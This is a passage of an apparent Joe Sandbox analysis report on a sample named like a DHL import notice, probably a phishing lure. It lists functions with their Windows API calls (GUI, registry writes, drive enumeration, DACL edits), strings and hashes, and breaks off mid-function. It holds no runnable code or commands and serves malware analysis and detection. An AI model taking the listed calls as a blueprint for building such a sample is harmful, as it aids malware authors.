CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00562D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00562D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00562D80
GlobalLock.KERNEL32(00000000), ref: 00562D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00562D98
GlobalUnlock.KERNEL32(00000000), ref: 00562DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00562DA8
GlobalFree.KERNEL32(00000000), ref: 00562DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00562DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0057FC38,00000000), ref: 00562DDB
GlobalFree.KERNEL32(00000000), ref: 00562DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00562E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00562E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00562E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0056303F

Strings

AutoIt v3, xrefs: 00562CF2
DISPLAY, xrefs: 00562EA2
static, xrefs: 00562D3A, 00562E91
, xrefs: 00562FC5

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: e632b635ce9a3db316b149fc78e10e2e7e4e4e21bc39971d28f750e91b304b2b
Instruction ID: d6abaeacbd276f35651acb72ad4e55aa0832a4cca8ddabcd1d045610a81f80b2
Opcode Fuzzy Hash: e632b635ce9a3db316b149fc78e10e2e7e4e4e21bc39971d28f750e91b304b2b
Instruction Fuzzy Hash: 21029A71A00204AFDB14DF64DC89EAE7FB9FB48315F00861CF919AB2A1DB34AD44DB60

Function 005770D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0057712F
GetSysColorBrush.USER32(0000000F), ref: 00577160
GetSysColor.USER32(0000000F), ref: 0057716C
SetBkColor.GDI32(?,000000FF), ref: 00577186
SelectObject.GDI32(?,?), ref: 00577195
InflateRect.USER32(?,000000FF,000000FF), ref: 005771C0
GetSysColor.USER32(00000010), ref: 005771C8
CreateSolidBrush.GDI32(00000000), ref: 005771CF
FrameRect.USER32(?,?,00000000), ref: 005771DE
DeleteObject.GDI32(00000000), ref: 005771E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00577230
FillRect.USER32(?,?,?), ref: 00577262
GetWindowLongW.USER32(?,000000F0), ref: 00577284

Part of subcall function 005773E8: GetSysColor.USER32(00000012), ref: 00577421
Part of subcall function 005773E8: SetTextColor.GDI32(?,?), ref: 00577425
Part of subcall function 005773E8: GetSysColorBrush.USER32(0000000F), ref: 0057743B
Part of subcall function 005773E8: GetSysColor.USER32(0000000F), ref: 00577446
Part of subcall function 005773E8: GetSysColor.USER32(00000011), ref: 00577463
Part of subcall function 005773E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00577471
Part of subcall function 005773E8: SelectObject.GDI32(?,00000000), ref: 00577482
Part of subcall function 005773E8: SetBkColor.GDI32(?,00000000), ref: 0057748B
Part of subcall function 005773E8: SelectObject.GDI32(?,?), ref: 00577498
Part of subcall function 005773E8: InflateRect.USER32(?,000000FF,000000FF), ref: 005774B7
Part of subcall function 005773E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005774CE
Part of subcall function 005773E8: GetWindowLongW.USER32(00000000,000000F0), ref: 005774DB

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: daa6fb8530cba8222815fae0cd150afd59b95947cc1dc595282957fed9827df0
Instruction ID: ccf518a3f16cf29cfc76e5b53f051a0d8ae20fdef14fa5838e14e138ba1a2a17
Opcode Fuzzy Hash: daa6fb8530cba8222815fae0cd150afd59b95947cc1dc595282957fed9827df0
Instruction Fuzzy Hash: 9EA1AF72008305AFD7009F60FC48E6B7FA9FB58321F104A2DF96A961E1D771E988EB51

Function 004F8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 004F8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00536AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00536AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00536F43

Part of subcall function 004F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004F8BE8,?,00000000,?,?,?,?,004F8BBA,00000000,?), ref: 004F8FC5

SendMessageW.USER32(?,00001053), ref: 00536F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00536F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00536FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00536FB7

Strings

0, xrefs: 00536DCF

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 9d83958ee30b72ce8f64ccb7dff1d529fe2dfa826782899bd852d08d2df73fd4
Instruction ID: aed6b274dd75ef9bef1eadd452010f09721396b907f4c3308d66e1ec5a152bfe
Opcode Fuzzy Hash: 9d83958ee30b72ce8f64ccb7dff1d529fe2dfa826782899bd852d08d2df73fd4
Instruction Fuzzy Hash: 9B12DB30200645AFCB21CF14D898BBABBE5FB54300F54856EE189CB261CB35EC96EF95

Function 00562711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0056273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0056286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 005628A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 005628B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00562900
GetClientRect.USER32(00000000,?), ref: 0056290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00562955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00562964
GetStockObject.GDI32(00000011), ref: 00562974
SelectObject.GDI32(00000000,00000000), ref: 00562978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00562988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00562991
DeleteDC.GDI32(00000000), ref: 0056299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 005629C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 005629DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00562A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00562A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00562A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00562A77
GetStockObject.GDI32(00000011), ref: 00562A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00562A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00562A97

Strings

msctls_progress32, xrefs: 00562A13
AutoIt v3, xrefs: 005628F8
DISPLAY, xrefs: 0056295A
static, xrefs: 0056294F, 00562A71

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: e4a625c7b3fc36c9e0aa166428570529403f8f7926226bf78f77a5c9799e0bc8
Instruction ID: a08c096e454074da9dc765a3bae2bce8e5ca00f99eba32325a3ce255e42aa581
Opcode Fuzzy Hash: e4a625c7b3fc36c9e0aa166428570529403f8f7926226bf78f77a5c9799e0bc8
Instruction Fuzzy Hash: 9CB19D71A00605AFEB10DF69DC89FAE7BB9FB08714F008619F915E7290D774AD40DBA4

Function 00554ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00554AED
GetDriveTypeW.KERNEL32(?,0057CB68,?,\\.\,0057CC08), ref: 00554BCA
SetErrorMode.KERNEL32(00000000,0057CB68,?,\\.\,0057CC08), ref: 00554D36

Strings

SSD, xrefs: 00554C4A
Fixed, xrefs: 00554C09
\\.\, xrefs: 00554B3F
FileBackedVirtual, xrefs: 00554CEC
iSCSI, xrefs: 00554CC2
MMC, xrefs: 00554CDE
ATAPI, xrefs: 00554C91
SAS, xrefs: 00554CC9
CDROM, xrefs: 00554BFB
Removable, xrefs: 00554C10, 00554C15
PhysicalDrive, xrefs: 00554B76
SATA, xrefs: 00554CD0
USB, xrefs: 00554CB4
RAID, xrefs: 00554CBB
Unknown, xrefs: 00554BED, 00554C83
Virtual, xrefs: 00554CE5
RAMDisk, xrefs: 00554BF4
Fibre, xrefs: 00554CAD
SSA, xrefs: 00554CA6
ATA, xrefs: 00554C98
1394, xrefs: 00554C9F
SCSI, xrefs: 00554C8A
Network, xrefs: 00554C02

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: c4ad67f36520e8b378104f47d746e216143562742730dfa8f1e6feb6a862b373
Instruction ID: 776e86243dd437cad1e2178d8a05598f82551da204bb897b4942deb2094b4a07
Opcode Fuzzy Hash: c4ad67f36520e8b378104f47d746e216143562742730dfa8f1e6feb6a862b373
Instruction Fuzzy Hash: 6861D630605106ABCB04DF25C9A196C7FB1BB8538EB28881BFC06AB691DB35DDC9DF51

Function 005773E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00577421
SetTextColor.GDI32(?,?), ref: 00577425
GetSysColorBrush.USER32(0000000F), ref: 0057743B
GetSysColor.USER32(0000000F), ref: 00577446
CreateSolidBrush.GDI32(?), ref: 0057744B
GetSysColor.USER32(00000011), ref: 00577463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00577471
SelectObject.GDI32(?,00000000), ref: 00577482
SetBkColor.GDI32(?,00000000), ref: 0057748B
SelectObject.GDI32(?,?), ref: 00577498
InflateRect.USER32(?,000000FF,000000FF), ref: 005774B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005774CE
GetWindowLongW.USER32(00000000,000000F0), ref: 005774DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0057752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00577554
InflateRect.USER32(?,000000FD,000000FD), ref: 00577572
DrawFocusRect.USER32(?,?), ref: 0057757D
GetSysColor.USER32(00000011), ref: 0057758E
SetTextColor.GDI32(?,00000000), ref: 00577596
DrawTextW.USER32(?,005770F5,000000FF,?,00000000), ref: 005775A8
SelectObject.GDI32(?,?), ref: 005775BF
DeleteObject.GDI32(?), ref: 005775CA
SelectObject.GDI32(?,?), ref: 005775D0
DeleteObject.GDI32(?), ref: 005775D5
SetTextColor.GDI32(?,?), ref: 005775DB
SetBkColor.GDI32(?,?), ref: 005775E5

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 30de39915e4046815f57fecb994f92387d4c1499258236308cc8522faa05417f
Instruction ID: 19a1a9e9bceeb377e643c000a304105a856956d40e89d282f5c9ebdd901c548d
Opcode Fuzzy Hash: 30de39915e4046815f57fecb994f92387d4c1499258236308cc8522faa05417f
Instruction Fuzzy Hash: 85615272900218AFDF019FA4EC49EAE7F79FB08320F114525F919AB2A1D7759984EF90

Function 00570FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00571128
GetDesktopWindow.USER32 ref: 0057113D
GetWindowRect.USER32(00000000), ref: 00571144
GetWindowLongW.USER32(?,000000F0), ref: 00571199
DestroyWindow.USER32(?), ref: 005711B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 005711ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0057120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0057121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00571232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00571245
IsWindowVisible.USER32(00000000), ref: 005712A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 005712BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 005712D0
GetWindowRect.USER32(00000000,?), ref: 005712E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0057130E
GetMonitorInfoW.USER32(00000000,?), ref: 00571328
CopyRect.USER32(?,?), ref: 0057133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 005713AA

Strings

(, xrefs: 0057131B
0, xrefs: 005710D3
tooltips_class32, xrefs: 005711E6

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 74aa7475b6367b2b83a600c9a7e07e0710b7bc9a6e27f0fe9f5d91747912e05e
Instruction ID: f8ff5f8c9e4f41aa7693935a67a15e24d7fe9768e8c3ab1a049c32d49c752ffb
Opcode Fuzzy Hash: 74aa7475b6367b2b83a600c9a7e07e0710b7bc9a6e27f0fe9f5d91747912e05e
Instruction Fuzzy Hash: EDB18B71604741AFD700DF69D888B6ABFE4FF84354F00891DF99A9B2A1CB31E844EB95

Function 004F8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004F8968
GetSystemMetrics.USER32(00000007), ref: 004F8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004F899B
GetSystemMetrics.USER32(00000008), ref: 004F89A3
GetSystemMetrics.USER32(00000004), ref: 004F89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004F89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004F89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004F8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004F8A3C
GetClientRect.USER32(00000000,000000FF), ref: 004F8A5A
GetStockObject.GDI32(00000011), ref: 004F8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 004F8A81

Part of subcall function 004F912D: GetCursorPos.USER32(?), ref: 004F9141
Part of subcall function 004F912D: ScreenToClient.USER32(00000000,?), ref: 004F915E
Part of subcall function 004F912D: GetAsyncKeyState.USER32(00000001), ref: 004F9183
Part of subcall function 004F912D: GetAsyncKeyState.USER32(00000002), ref: 004F919D

SetTimer.USER32(00000000,00000000,00000028,004F90FC), ref: 004F8AA8

Strings

AutoIt v3 GUI, xrefs: 004F8A20

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 815d9d95e2dd6ed4b2dd7fcbce1229f305e7e31782adc13c427931ee7567b438
Instruction ID: 23f97ca41a9f1ecd3412bfc7f300ff8e45e9e5319347627f05ff817fb85261e4
Opcode Fuzzy Hash: 815d9d95e2dd6ed4b2dd7fcbce1229f305e7e31782adc13c427931ee7567b438
Instruction Fuzzy Hash: 57B1AE71A00209AFDF14DFA8DC59BAE3BB0FB48314F10422EFA15AB290DB74E941DB55

Function 00540D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 005410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00541114
Part of subcall function 005410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00540B9B,?,?,?), ref: 00541120
Part of subcall function 005410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00540B9B,?,?,?), ref: 0054112F
Part of subcall function 005410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00540B9B,?,?,?), ref: 00541136
Part of subcall function 005410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0054114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00540DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00540E29
GetLengthSid.ADVAPI32(?), ref: 00540E40
GetAce.ADVAPI32(?,00000000,?), ref: 00540E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00540E96
GetLengthSid.ADVAPI32(?), ref: 00540EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00540EB5
HeapAlloc.KERNEL32(00000000), ref: 00540EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00540EDD
CopySid.ADVAPI32(00000000), ref: 00540EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00540F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00540F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00540F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00540F6E
HeapFree.KERNEL32(00000000), ref: 00540F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00540F7E
HeapFree.KERNEL32(00000000), ref: 00540F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00540F8E
HeapFree.KERNEL32(00000000), ref: 00540F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00540FA1
HeapFree.KERNEL32(00000000), ref: 00540FA8

Part of subcall function 00541193: GetProcessHeap.KERNEL32(00000008,00540BB1,?,00000000,?,00540BB1,?), ref: 005411A1
Part of subcall function 00541193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00540BB1,?), ref: 005411A8
Part of subcall function 00541193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00540BB1,?), ref: 005411B7

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: cb26ff508f48a6f454c36b9a9ee9f7690828e2df89e0c8a7e1a1403a2c491672
Instruction ID: 08a757b878ed4be3016873961b08ab95d9c4c224542023a0e525307aed40c9fa
Opcode Fuzzy Hash: cb26ff508f48a6f454c36b9a9ee9f7690828e2df89e0c8a7e1a1403a2c491672
Instruction Fuzzy Hash: F6716F7190020ABFDF209FA4EC48FEEBFB8BF14304F144129FA19A6191D7359959DBA0

Function 0056C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0056C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0057CC08,00000000,?,00000000,?,?), ref: 0056C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0056C5A4
_wcslen.LIBCMT ref: 0056C5F4
_wcslen.LIBCMT ref: 0056C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0056C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0056C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0056C84D
RegCloseKey.ADVAPI32(?), ref: 0056C881
RegCloseKey.ADVAPI32(00000000), ref: 0056C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0056C960

Strings

REG_QWORD, xrefs: 0056C8C3
REG_EXPAND_SZ, xrefs: 0056C5CD
REG_BINARY, xrefs: 0056C913
REG_SZ, xrefs: 0056C644
REG_MULTI_SZ, xrefs: 0056C6F5
REG_DWORD, xrefs: 0056C804

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: eaa36a4eb039d3832161164fb1e5ea0a0edd209f31a846bbf2923d845b1e424f
Instruction ID: da14009541269924d4b869b82889a75222e741ed6c059e57b731b1ae6c18a26d
Opcode Fuzzy Hash: eaa36a4eb039d3832161164fb1e5ea0a0edd209f31a846bbf2923d845b1e424f
Instruction Fuzzy Hash: B2127B352042019FC714DF15C885A2ABBE5FF88769F04895DF88A9B3A2DB35FD41CB85

Function 0057091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 005709C6
